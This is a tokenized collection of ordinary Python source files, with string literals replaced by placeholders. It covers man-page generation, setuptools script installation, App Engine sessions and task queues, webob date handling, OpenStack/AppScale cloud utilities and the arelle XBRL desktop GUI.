<EOL> def Body ( self ) : raise NotImplementedError <EOL> def Footer ( self ) : raise NotImplementedError <EOL> class GenerateMan ( GenerateDoc ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , proginfo , directory = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> GenerateDoc . __init__ ( self , proginfo , directory ) <EOL> def Open ( self ) : <EOL> if self . dirname == '<STR_LIT:->' : <EOL> logging . info ( '<STR_LIT>' ) <EOL> self . fp = sys . stdout <EOL> else : <EOL> self . file_path = '<STR_LIT>' % os . path . join ( self . dirname , self . info . name ) <EOL> logging . info ( '<STR_LIT>' % self . file_path ) <EOL> self . fp = open ( self . file_path , '<STR_LIT:w>' ) <EOL> def Header ( self ) : <EOL> self . fp . write ( <EOL> '<STR_LIT>' <EOL> % _VERSION ) <EOL> self . fp . write ( <EOL> '<STR_LIT>' <EOL> % ( self . info . name , time . strftime ( '<STR_LIT>' , self . info . date ) , self . info . name ) ) <EOL> self . fp . write ( <EOL> '<STR_LIT>' % ( self . info . name , self . info . short_desc ) ) <EOL> self . fp . write ( <EOL> '<STR_LIT>' % self . info . name ) <EOL> def Body ( self ) : <EOL> self . fp . write ( <EOL> '<STR_LIT>' ) <EOL> for ln in self . info . desc : <EOL> self . fp . write ( '<STR_LIT>' % ln ) <EOL> self . fp . write ( <EOL> '<STR_LIT>' ) <EOL> for modname in self . info . module_list : <EOL> if modname . find ( self . info . executable ) >= <NUM_LIT:0> : <EOL> mod = modname . replace ( self . info . executable , self . info . name ) <EOL> else : <EOL> mod = modname <EOL> self . fp . write ( '<STR_LIT>' % mod ) <EOL> for flag in self . info . modules [ modname ] : <EOL> help_string = flag . help <EOL> if flag . default or flag . tips : <EOL> help_string += '<STR_LIT>' <EOL> if flag . default : <EOL> help_string += '<STR_LIT>' % flag . default <EOL> if flag . tips : <EOL> help_string += '<STR_LIT>' % flag . tips <EOL> self . fp . write ( <EOL> '<STR_LIT>' % ( flag . desc , help_string ) ) <EOL> def Footer ( self ) : <EOL> self . fp . write ( <EOL> '<STR_LIT>' <EOL> % time . strftime ( '<STR_LIT>' , self . info . date ) ) <EOL> self . fp . write ( '<STR_LIT>' <EOL> % ( self . info . name , FLAGS . help_flag ) ) <EOL> self . fp . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % self . info . name ) <EOL> def main ( argv ) : <EOL> argv = FLAGS ( argv ) <EOL> if len ( argv ) <= <NUM_LIT:1> : <EOL> app . usage ( shorthelp = <NUM_LIT:1> ) <EOL> return <NUM_LIT:1> <EOL> for arg in argv [ <NUM_LIT:1> : ] : <EOL> prog = ProgramInfo ( arg ) <EOL> if not prog . Run ( ) : <EOL> continue <EOL> prog . Parse ( ) <EOL> prog . Filter ( ) <EOL> doc = GenerateMan ( prog , FLAGS . dest_dir ) <EOL> doc . Output ( ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( ) </s>
<s> from distutils . command . install_scripts import install_scripts as _install_scripts <EOL> from easy_install import get_script_args , sys_executable , chmod <EOL> from pkg_resources import Distribution , PathMetadata , ensure_directory <EOL> import os <EOL> from distutils import log <EOL> class install_scripts ( _install_scripts ) : <EOL> """<STR_LIT>""" <EOL> def initialize_options ( self ) : <EOL> _install_scripts . initialize_options ( self ) <EOL> self . no_ep = False <EOL> def run ( self ) : <EOL> self . run_command ( "<STR_LIT>" ) <EOL> if self . distribution . scripts : <EOL> _install_scripts . run ( self ) <EOL> else : <EOL> self . outfiles = [ ] <EOL> if self . no_ep : <EOL> return <EOL> ei_cmd = self . get_finalized_command ( "<STR_LIT>" ) <EOL> dist = Distribution ( <EOL> ei_cmd . egg_base , PathMetadata ( ei_cmd . egg_base , ei_cmd . egg_info ) , <EOL> ei_cmd . egg_name , ei_cmd . egg_version , <EOL> ) <EOL> bs_cmd = self . get_finalized_command ( '<STR_LIT>' ) <EOL> executable = getattr ( bs_cmd , '<STR_LIT>' , sys_executable ) <EOL> is_wininst = getattr ( <EOL> self . get_finalized_command ( "<STR_LIT>" ) , '<STR_LIT>' , False <EOL> ) <EOL> for args in get_script_args ( dist , executable , is_wininst ) : <EOL> self . write_script ( * args ) <EOL> def write_script ( self , script_name , contents , mode = "<STR_LIT:t>" , * ignored ) : <EOL> """<STR_LIT>""" <EOL> log . info ( "<STR_LIT>" , script_name , self . install_dir ) <EOL> target = os . path . join ( self . install_dir , script_name ) <EOL> self . outfiles . append ( target ) <EOL> if not self . dry_run : <EOL> ensure_directory ( target ) <EOL> f = open ( target , "<STR_LIT:w>" + mode ) <EOL> f . write ( contents ) <EOL> f . close ( ) <EOL> chmod ( target , <NUM_LIT:0> <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from google . appengine . api import memcache <EOL> try : <EOL> from ndb import model <EOL> except ImportError : <EOL> from google . appengine . ext . ndb import model <EOL> try : <EOL> from ndb . model import PickleProperty <EOL> except ImportError : <EOL> try : <EOL> from google . appengine . ext . ndb . model import PickleProperty <EOL> except ImportError : <EOL> import pickle <EOL> class PickleProperty ( model . BlobProperty ) : <EOL> """<STR_LIT>""" <EOL> def _validate ( self , value ) : <EOL> return value <EOL> def _db_set_value ( self , v , p , value ) : <EOL> super ( PickleProperty , self ) . _db_set_value ( v , p , <EOL> pickle . dumps ( value ) ) <EOL> def _db_get_value ( self , v , p ) : <EOL> if not v . has_stringvalue ( ) : <EOL> return None <EOL> return pickle . loads ( v . stringvalue ( ) ) <EOL> from webapp2_extras import sessions <EOL> class Session ( model . Model ) : <EOL> """<STR_LIT>""" <EOL> updated = model . DateTimeProperty ( auto_now = True ) <EOL> data = PickleProperty ( ) <EOL> @ classmethod <EOL> def get_by_sid ( cls , sid ) : <EOL> """<STR_LIT>""" <EOL> data = memcache . get ( sid ) <EOL> if not data : <EOL> session = model . Key ( cls , sid ) . get ( ) <EOL> if session : <EOL> data = session . data <EOL> memcache . set ( sid , data ) <EOL> return data <EOL> def _put ( self ) : <EOL> """<STR_LIT>""" <EOL> memcache . set ( self . _key . id ( ) , self . data ) <EOL> super ( Session , self ) . put ( ) <EOL> class DatastoreSessionFactory ( sessions . CustomBackendSessionFactory ) : <EOL> """<STR_LIT>""" <EOL> session_model = Session <EOL> def _get_by_sid ( self , sid ) : <EOL> """<STR_LIT>""" <EOL> if self . _is_valid_sid ( sid ) : <EOL> data = self . session_model . get_by_sid ( sid ) <EOL> if data is not None : <EOL> self . sid = sid <EOL> return sessions . SessionDict ( self , data = data ) <EOL> self . sid = self . _get_new_sid ( ) <EOL> return sessions . SessionDict ( self , new = True ) <EOL> def save_session ( self , response ) : <EOL> if self . session is None or not self . session . modified : <EOL> return <EOL> self . session_model ( id = self . sid , data = dict ( self . session ) ) . _put ( ) <EOL> self . session_store . save_secure_cookie ( <EOL> response , self . name , { '<STR_LIT>' : self . sid } , ** self . session_args ) </s>
<s> import calendar <EOL> from datetime import ( <EOL> date , <EOL> datetime , <EOL> timedelta , <EOL> tzinfo , <EOL> ) <EOL> from email . utils import ( <EOL> formatdate , <EOL> mktime_tz , <EOL> parsedate_tz , <EOL> ) <EOL> import time <EOL> from webob . compat import ( <EOL> integer_types , <EOL> long , <EOL> native_ , <EOL> text_type , <EOL> ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> _now = datetime . now <EOL> class _UTC ( tzinfo ) : <EOL> def dst ( self , dt ) : <EOL> return timedelta ( <NUM_LIT:0> ) <EOL> def utcoffset ( self , dt ) : <EOL> return timedelta ( <NUM_LIT:0> ) <EOL> def tzname ( self , dt ) : <EOL> return '<STR_LIT>' <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' <EOL> UTC = _UTC ( ) <EOL> def timedelta_to_seconds ( td ) : <EOL> """<STR_LIT>""" <EOL> return td . seconds + ( td . days * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> day = timedelta ( days = <NUM_LIT:1> ) <EOL> week = timedelta ( weeks = <NUM_LIT:1> ) <EOL> hour = timedelta ( hours = <NUM_LIT:1> ) <EOL> minute = timedelta ( minutes = <NUM_LIT:1> ) <EOL> second = timedelta ( seconds = <NUM_LIT:1> ) <EOL> month = timedelta ( days = <NUM_LIT:30> ) <EOL> year = timedelta ( days = <NUM_LIT> ) <EOL> def parse_date ( value ) : <EOL> if not value : <EOL> return None <EOL> try : <EOL> value = native_ ( value ) <EOL> except : <EOL> return None <EOL> t = parsedate_tz ( value ) <EOL> if t is None : <EOL> return None <EOL> if t [ - <NUM_LIT:1> ] is None : <EOL> t = t [ : <NUM_LIT:9> ] + ( <NUM_LIT:0> , ) <EOL> t = mktime_tz ( t ) <EOL> return datetime . fromtimestamp ( t , UTC ) <EOL> def serialize_date ( dt ) : <EOL> if isinstance ( dt , ( bytes , text_type ) ) : <EOL> return native_ ( dt ) <EOL> if isinstance ( dt , timedelta ) : <EOL> dt = _now ( ) + dt <EOL> if isinstance ( dt , ( datetime , date ) ) : <EOL> dt = dt . timetuple ( ) <EOL> if isinstance ( dt , ( tuple , time . struct_time ) ) : <EOL> dt = calendar . timegm ( dt ) <EOL> if not ( isinstance ( dt , float ) or isinstance ( dt , integer_types ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % dt ) <EOL> return formatdate ( dt , usegmt = True ) <EOL> def parse_date_delta ( value ) : <EOL> """<STR_LIT>""" <EOL> if not value : <EOL> return None <EOL> try : <EOL> value = int ( value ) <EOL> except ValueError : <EOL> return parse_date ( value ) <EOL> else : <EOL> return _now ( ) + timedelta ( seconds = value ) <EOL> def serialize_date_delta ( value ) : <EOL> if isinstance ( value , ( float , int , long ) ) : <EOL> return str ( int ( value ) ) <EOL> else : <EOL> return serialize_date ( value ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' ] <EOL> try : <EOL> from UserDict import DictMixin <EOL> except ImportError : <EOL> class DictMixin : <EOL> def __iter__ ( self ) : <EOL> for k in self . keys ( ) : <EOL> yield k <EOL> def has_key ( self , key ) : <EOL> try : <EOL> value = self [ key ] <EOL> except KeyError : <EOL> return False <EOL> return True <EOL> def __contains__ ( self , key ) : <EOL> return self . has_key ( key ) <EOL> def iteritems ( self ) : <EOL> for k in self : <EOL> yield ( k , self [ k ] ) <EOL> def iterkeys ( self ) : <EOL> return self . __iter__ ( ) <EOL> def itervalues ( self ) : <EOL> for _ , v in self . iteritems ( ) : <EOL> yield v <EOL> def values ( self ) : <EOL> return [ v for _ , v in self . iteritems ( ) ] <EOL> def items ( self ) : <EOL> return list ( self . iteritems ( ) ) <EOL> def clear ( self ) : <EOL> for key in self . keys ( ) : <EOL> del self [ key ] <EOL> def setdefault ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> self [ key ] = default <EOL> return default <EOL> def pop ( self , key , * args ) : <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> raise TypeError , "<STR_LIT>" + repr ( <NUM_LIT:1> + len ( args ) ) <EOL> try : <EOL> value = self [ key ] <EOL> except KeyError : <EOL> if args : <EOL> return args [ <NUM_LIT:0> ] <EOL> raise <EOL> del self [ key ] <EOL> return value <EOL> def popitem ( self ) : <EOL> try : <EOL> k , v = self . iteritems ( ) . next ( ) <EOL> except StopIteration : <EOL> raise KeyError , '<STR_LIT>' <EOL> del self [ k ] <EOL> return ( k , v ) <EOL> def update ( self , other = None , ** kwargs ) : <EOL> if other is None : <EOL> pass <EOL> elif hasattr ( other , '<STR_LIT>' ) : <EOL> for k , v in other . iteritems ( ) : <EOL> self [ k ] = v <EOL> elif hasattr ( other , '<STR_LIT>' ) : <EOL> for k in other . keys ( ) : <EOL> self [ k ] = other [ k ] <EOL> else : <EOL> for k , v in other : <EOL> self [ k ] = v <EOL> if kwargs : <EOL> self . update ( kwargs ) <EOL> def get ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def __repr__ ( self ) : <EOL> return repr ( dict ( self . iteritems ( ) ) ) <EOL> def __cmp__ ( self , other ) : <EOL> if other is None : <EOL> return <NUM_LIT:1> <EOL> if isinstance ( other , DictMixin ) : <EOL> other = dict ( other . iteritems ( ) ) <EOL> return cmp ( dict ( self . iteritems ( ) ) , other ) <EOL> def __len__ ( self ) : <EOL> return len ( self . keys ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import os <EOL> import string <EOL> import sys <EOL> import random <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) <EOL> from google . appengine . api . taskqueue import taskqueue_service_pb <EOL> MAX_ETA = datetime . timedelta ( days = <NUM_LIT:30> ) <EOL> MAX_PULL_TASK_SIZE_BYTES = <NUM_LIT:2> ** <NUM_LIT:20> <EOL> MAX_PUSH_TASK_SIZE_BYTES = <NUM_LIT:100> * ( <NUM_LIT:2> ** <NUM_LIT:10> ) <EOL> RAND_LENGTH_SIZE = <NUM_LIT:32> <EOL> class TASK_STATES : <EOL> QUEUED = "<STR_LIT>" <EOL> SUCCESS = "<STR_LIT:success>" <EOL> FAILED = "<STR_LIT>" <EOL> EXPIRED = "<STR_LIT>" <EOL> def _sec_to_usec ( t_sec ) : <EOL> """<STR_LIT>""" <EOL> return int ( t_sec * <NUM_LIT> ) <EOL> def _usec_to_sec ( t_sec ) : <EOL> """<STR_LIT>""" <EOL> return t_sec / <NUM_LIT> <EOL> def verify_task_queue_add_request ( app_id , request , now ) : <EOL> """<STR_LIT>""" <EOL> if request . eta_usec ( ) < <NUM_LIT:0> : <EOL> return taskqueue_service_pb . TaskQueueServiceError . INVALID_ETA <EOL> eta = datetime . datetime . utcfromtimestamp ( _usec_to_sec ( request . eta_usec ( ) ) ) <EOL> max_eta = now + MAX_ETA <EOL> if eta > max_eta : <EOL> return taskqueue_service_pb . TaskQueueServiceError . INVALID_ETA <EOL> if request . has_crontimetable ( ) and app_id is None : <EOL> return taskqueue_service_pb . TaskQueueServiceError . PERMISSION_DENIED <EOL> if request . mode ( ) == taskqueue_service_pb . TaskQueueMode . PULL : <EOL> max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES <EOL> else : <EOL> max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES <EOL> if request . ByteSize ( ) > max_task_size_bytes : <EOL> return taskqueue_service_pb . TaskQueueServiceError . TASK_TOO_LARGE <EOL> return taskqueue_service_pb . TaskQueueServiceError . SKIPPED <EOL> def _get_random_string ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( random . choice ( string . ascii_uppercase + string . digits ) for x in range ( RAND_LENGTH_SIZE ) ) <EOL> def choose_task_name ( app_name , queue_name , user_chosen = None ) : <EOL> """<STR_LIT>""" <EOL> if not user_chosen : <EOL> user_chosen = _get_random_string ( ) <EOL> return '<STR_LIT>' % ( app_name , queue_name , user_chosen ) </s>
<s> """<STR_LIT>""" <EOL> from agents . ec2_agent import EC2Agent <EOL> from boto . exception import EC2ResponseError <EOL> import boto <EOL> import os <EOL> from urlparse import urlparse <EOL> from utils import utils <EOL> __author__ = '<STR_LIT>' <EOL> __email__ = '<STR_LIT>' <EOL> class OpenStackAgent ( EC2Agent ) : <EOL> """<STR_LIT>""" <EOL> DEFAULT_REGION = "<STR_LIT>" <EOL> def configure_instance_security ( self , parameters ) : <EOL> """<STR_LIT>""" <EOL> keyname = parameters [ self . PARAM_KEYNAME ] <EOL> group = parameters [ self . PARAM_GROUP ] <EOL> key_path = '<STR_LIT>' . format ( utils . KEY_DIRECTORY , keyname ) <EOL> ssh_key = os . path . abspath ( key_path ) <EOL> utils . log ( '<STR_LIT>' '<STR_LIT>' . format ( ssh_key ) ) <EOL> if os . path . exists ( ssh_key ) : <EOL> utils . log ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return False <EOL> try : <EOL> conn = self . open_connection ( parameters ) <EOL> key_pair = conn . get_key_pair ( keyname ) <EOL> if key_pair is None : <EOL> utils . log ( '<STR_LIT>' . format ( keyname ) ) <EOL> key_pair = conn . create_key_pair ( keyname ) <EOL> utils . write_key_file ( ssh_key , key_pair . material ) <EOL> security_groups = conn . get_all_security_groups ( ) <EOL> group_exists = False <EOL> for security_group in security_groups : <EOL> if security_group . name == group : <EOL> group_exists = True <EOL> break <EOL> if not group_exists : <EOL> utils . log ( '<STR_LIT>' . format ( group ) ) <EOL> conn . create_security_group ( group , '<STR_LIT>' ) <EOL> conn . authorize_security_group ( group , from_port = <NUM_LIT:1> , to_port = <NUM_LIT> , ip_protocol = '<STR_LIT>' ) <EOL> conn . authorize_security_group ( group , from_port = <NUM_LIT:1> , to_port = <NUM_LIT> , ip_protocol = '<STR_LIT>' ) <EOL> conn . authorize_security_group ( group , from_port = - <NUM_LIT:1> , to_port = - <NUM_LIT:1> , ip_protocol = '<STR_LIT>' , cidr_ip = '<STR_LIT>' ) <EOL> return True <EOL> except EC2ResponseError as exception : <EOL> self . handle_failure ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( exception . error_message ) ) <EOL> except Exception as exception : <EOL> self . handle_failure ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( exception . message ) ) <EOL> def run_instances ( self , count , parameters , security_configured ) : <EOL> """<STR_LIT>""" <EOL> if parameters [ self . PARAM_SPOT ] == "<STR_LIT:True>" : <EOL> parameters [ self . PARAM_SPOT ] = '<STR_LIT:False>' <EOL> utils . log ( "<STR_LIT>" ) <EOL> super . run_instances ( self , count , parameters , security_configured ) <EOL> def open_connection ( self , parameters ) : <EOL> """<STR_LIT>""" <EOL> credentials = parameters [ self . PARAM_CREDENTIALS ] <EOL> region_str = self . DEFAULT_REGION <EOL> access_key = str ( credentials [ '<STR_LIT>' ] ) <EOL> secret_key = str ( credentials [ '<STR_LIT>' ] ) <EOL> ec2_url = str ( credentials [ '<STR_LIT>' ] ) <EOL> result = urlparse ( ec2_url ) <EOL> if result . port is None or result . hostname is None or result . path is None : <EOL> self . handle_failure ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( result . scheme ) ) <EOL> return None <EOL> region = boto . ec2 . regioninfo . RegionInfo ( name = region_str , endpoint = result . hostname ) <EOL> return boto . connect_ec2 ( aws_access_key_id = access_key , <EOL> aws_secret_access_key = secret_key , <EOL> is_secure = ( result . scheme == '<STR_LIT>' ) , <EOL> region = region , <EOL> port = result . port , <EOL> path = result . path , debug = <NUM_LIT:2> ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import logging <EOL> import multiprocessing <EOL> import os <EOL> import sys <EOL> import yaml <EOL> import constants <EOL> import file_io <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> from google . appengine . api . appcontroller_client import AppControllerClient <EOL> def read_file_contents ( path ) : <EOL> """<STR_LIT>""" <EOL> with open ( path ) as file_handle : <EOL> return file_handle . read ( ) <EOL> def get_appcontroller_client ( ) : <EOL> """<STR_LIT>""" <EOL> head_node_ip_file = '<STR_LIT>' <EOL> head_node = read_file_contents ( head_node_ip_file ) . rstrip ( '<STR_LIT:\n>' ) <EOL> secret_file = '<STR_LIT>' <EOL> secret = read_file_contents ( secret_file ) <EOL> return AppControllerClient ( head_node , secret ) <EOL> def get_keyname ( ) : <EOL> """<STR_LIT>""" <EOL> return get_db_info ( ) [ '<STR_LIT>' ] <EOL> def get_all_ips ( ) : <EOL> """<STR_LIT>""" <EOL> nodes = file_io . read ( constants . ALL_IPS_LOC ) <EOL> nodes = nodes . split ( '<STR_LIT:\n>' ) <EOL> return filter ( None , nodes ) <EOL> def get_login_ip ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . LOGIN_IP_LOC ) . rstrip ( ) <EOL> def get_private_ip ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . PRIVATE_IP_LOC ) . rstrip ( ) <EOL> def get_public_ip ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . PUBLIC_IP_LOC ) . rstrip ( ) <EOL> def get_secret ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . SECRET_LOC ) . rstrip ( ) <EOL> def get_num_cpus ( ) : <EOL> """<STR_LIT>""" <EOL> return multiprocessing . cpu_count ( ) <EOL> def get_db_info ( ) : <EOL> """<STR_LIT>""" <EOL> info = file_io . read ( constants . DB_INFO_LOC ) <EOL> return yaml . load ( info ) <EOL> def get_taskqueue_nodes ( ) : <EOL> """<STR_LIT>""" <EOL> nodes = file_io . read ( constants . TASKQUEUE_NODE_FILE ) <EOL> nodes = nodes . split ( '<STR_LIT:\n>' ) <EOL> if nodes [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> nodes = nodes [ : - <NUM_LIT:1> ] <EOL> return nodes <EOL> def get_app_path ( app_id ) : <EOL> """<STR_LIT>""" <EOL> return constants . APPS_PATH + app_id + '<STR_LIT>' <EOL> def get_zk_locations_string ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> info = file_io . read ( constants . ZK_LOCATIONS_JSON_FILE ) <EOL> zk_json = json . loads ( info ) <EOL> return "<STR_LIT>" . join ( zk_json [ '<STR_LIT>' ] ) + "<STR_LIT>" <EOL> except IOError , io_error : <EOL> logging . exception ( io_error ) <EOL> return constants . ZK_DEFAULT_CONNECTION_STR <EOL> except ValueError , value_error : <EOL> logging . exception ( value_error ) <EOL> return constants . ZK_DEFAULT_CONNECTION_STR <EOL> except TypeError , type_error : <EOL> logging . exception ( type_error ) <EOL> return constants . ZK_DEFAULT_CONNECTION_STR <EOL> except KeyError , key_error : <EOL> logging . exception ( key_error ) <EOL> return constants . ZK_DEFAULT_CONNECTION_STR <EOL> def get_zk_node_ips ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> info = file_io . read ( constants . ZK_LOCATIONS_JSON_FILE ) <EOL> zk_json = json . loads ( info ) <EOL> return zk_json [ '<STR_LIT>' ] <EOL> except IOError , io_error : <EOL> logging . exception ( io_error ) <EOL> return [ ] <EOL> except ValueError , value_error : <EOL> logging . exception ( value_error ) <EOL> return [ ] <EOL> except TypeError , type_error : <EOL> logging . exception ( type_error ) <EOL> return [ ] <EOL> except KeyError , key_error : <EOL> logging . exception ( key_error ) <EOL> return [ ] <EOL> def get_db_master_ip ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . MASTERS_FILE_LOC ) . rstrip ( ) <EOL> def get_db_slave_ips ( ) : <EOL> """<STR_LIT>""" <EOL> nodes = file_io . read ( constants . SLAVES_FILE_LOC ) . rstrip ( ) <EOL> nodes = nodes . split ( '<STR_LIT:\n>' ) <EOL> if nodes [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> nodes = nodes [ : - <NUM_LIT:1> ] <EOL> return nodes <EOL> def get_db_ips ( ) : <EOL> """<STR_LIT>""" <EOL> return list ( set ( [ get_db_master_ip ( ) ] + get_db_slave_ips ( ) ) ) <EOL> def get_search_location ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return file_io . read ( constants . SEARCH_FILE_LOC ) . rstrip ( ) <EOL> except IOError : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" </s>
<s> '''<STR_LIT>''' <EOL> from arelle import PythonUtil <EOL> import os , sys , subprocess , pickle , time , locale , re <EOL> from tkinter import ( Tk , TclError , Toplevel , Menu , PhotoImage , StringVar , BooleanVar , N , S , E , W , EW , <EOL> HORIZONTAL , VERTICAL , END , font as tkFont ) <EOL> try : <EOL> from tkinter . ttk import Frame , Button , Label , Combobox , Separator , PanedWindow , Notebook <EOL> except ImportError : <EOL> from ttk import Frame , Button , Label , Combobox , Separator , PanedWindow , Notebook <EOL> import tkinter . tix <EOL> import tkinter . filedialog <EOL> import tkinter . messagebox , traceback <EOL> from arelle . Locale import format_string <EOL> from arelle . CntlrWinTooltip import ToolTip <EOL> from arelle import XbrlConst <EOL> from arelle . PluginManager import pluginClassMethods <EOL> from arelle . UrlUtil import isHttpUrl <EOL> import logging <EOL> import threading , queue <EOL> from arelle import Cntlr <EOL> from arelle import ( DialogURL , DialogLanguage , <EOL> DialogPluginManager , DialogPackageManager , <EOL> ModelDocument , <EOL> ModelManager , <EOL> PackageManager , <EOL> RenderingEvaluator , <EOL> TableStructure , <EOL> ViewWinDTS , <EOL> ViewWinProperties , ViewWinConcepts , ViewWinRelationshipSet , ViewWinFormulae , <EOL> ViewWinFactList , ViewFileFactList , ViewWinFactTable , ViewWinRenderedGrid , ViewWinXml , <EOL> ViewWinRoleTypes , ViewFileRoleTypes , ViewFileConcepts , <EOL> ViewWinTests , ViewWinTree , ViewWinVersReport , ViewWinRssFeed , <EOL> ViewFileTests , <EOL> ViewFileRenderedGrid , <EOL> ViewFileRelationshipSet , <EOL> Updater <EOL> ) <EOL> from arelle . ModelFormulaObject import FormulaOptions <EOL> from arelle . FileSource import openFileSource <EOL> restartMain = True <EOL> class CntlrWinMain ( Cntlr . Cntlr ) : <EOL> def __init__ ( self , parent ) : <EOL> super ( CntlrWinMain , self ) . __init__ ( hasGui = True ) <EOL> self . parent = parent <EOL> self . filename = None <EOL> self . dirty = False <EOL> overrideLang = self . config . get ( "<STR_LIT>" ) <EOL> self . labelLang = overrideLang if overrideLang else self . modelManager . defaultLang <EOL> self . data = { } <EOL> if self . isMac : <EOL> _defaultFont = tkFont . nametofont ( "<STR_LIT>" ) <EOL> _defaultFont . configure ( size = <NUM_LIT:11> ) <EOL> _textFont = tkFont . nametofont ( "<STR_LIT>" ) <EOL> _textFont . configure ( size = <NUM_LIT:11> ) <EOL> toolbarButtonPadding = <NUM_LIT:1> <EOL> else : <EOL> toolbarButtonPadding = <NUM_LIT:4> <EOL> tkinter . CallWrapper = TkinterCallWrapper <EOL> imgpath = self . imagesDir + os . sep <EOL> if self . isMSW : <EOL> icon = imgpath + "<STR_LIT>" <EOL> parent . iconbitmap ( icon , default = icon ) <EOL> else : <EOL> parent . iconbitmap ( "<STR_LIT:@>" + imgpath + "<STR_LIT>" ) <EOL> self . menubar = Menu ( self . parent ) <EOL> self . parent [ "<STR_LIT>" ] = self . menubar <EOL> self . fileMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> self . fileMenuLength = <NUM_LIT:1> <EOL> for label , command , shortcut_text , shortcut in ( <EOL> ( _ ( "<STR_LIT>" ) , self . fileOpen , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( _ ( "<STR_LIT>" ) , self . webOpen , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( _ ( "<STR_LIT>" ) , self . importFileOpen , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . importWebOpen , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . fileSaveExistingFile , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( _ ( "<STR_LIT>" ) , self . fileSave , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . saveDTSpackage , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . fileClose , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( None , None , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . quit , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( None , None , None , None ) , <EOL> ( "<STR_LIT>" , None , None , None ) <EOL> ) : <EOL> if label is None : <EOL> self . fileMenu . add_separator ( ) <EOL> elif label == "<STR_LIT>" : <EOL> for pluginMenuExtender in pluginClassMethods ( command ) : <EOL> pluginMenuExtender ( self , self . fileMenu ) <EOL> self . fileMenuLength += <NUM_LIT:1> <EOL> else : <EOL> self . fileMenu . add_command ( label = label , underline = <NUM_LIT:0> , command = command , accelerator = shortcut_text ) <EOL> self . parent . bind ( shortcut , command ) <EOL> self . fileMenuLength += <NUM_LIT:1> <EOL> self . loadFileMenuHistory ( ) <EOL> self . menubar . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = self . fileMenu , underline = <NUM_LIT:0> ) <EOL> toolsMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> validateMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = validateMenu , underline = <NUM_LIT:0> ) <EOL> validateMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . validate ) <EOL> self . modelManager . validateDisclosureSystem = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . validateDisclosureSystem = BooleanVar ( value = self . modelManager . validateDisclosureSystem ) <EOL> self . validateDisclosureSystem . trace ( "<STR_LIT:w>" , self . setValidateDisclosureSystem ) <EOL> validateMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . validateDisclosureSystem , onvalue = True , offvalue = False ) <EOL> validateMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . selectDisclosureSystem ) <EOL> self . modelManager . validateCalcLB = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . validateCalcLB = BooleanVar ( value = self . modelManager . validateCalcLB ) <EOL> self . validateCalcLB . trace ( "<STR_LIT:w>" , self . setValidateCalcLB ) <EOL> validateMenu . add_checkbutton 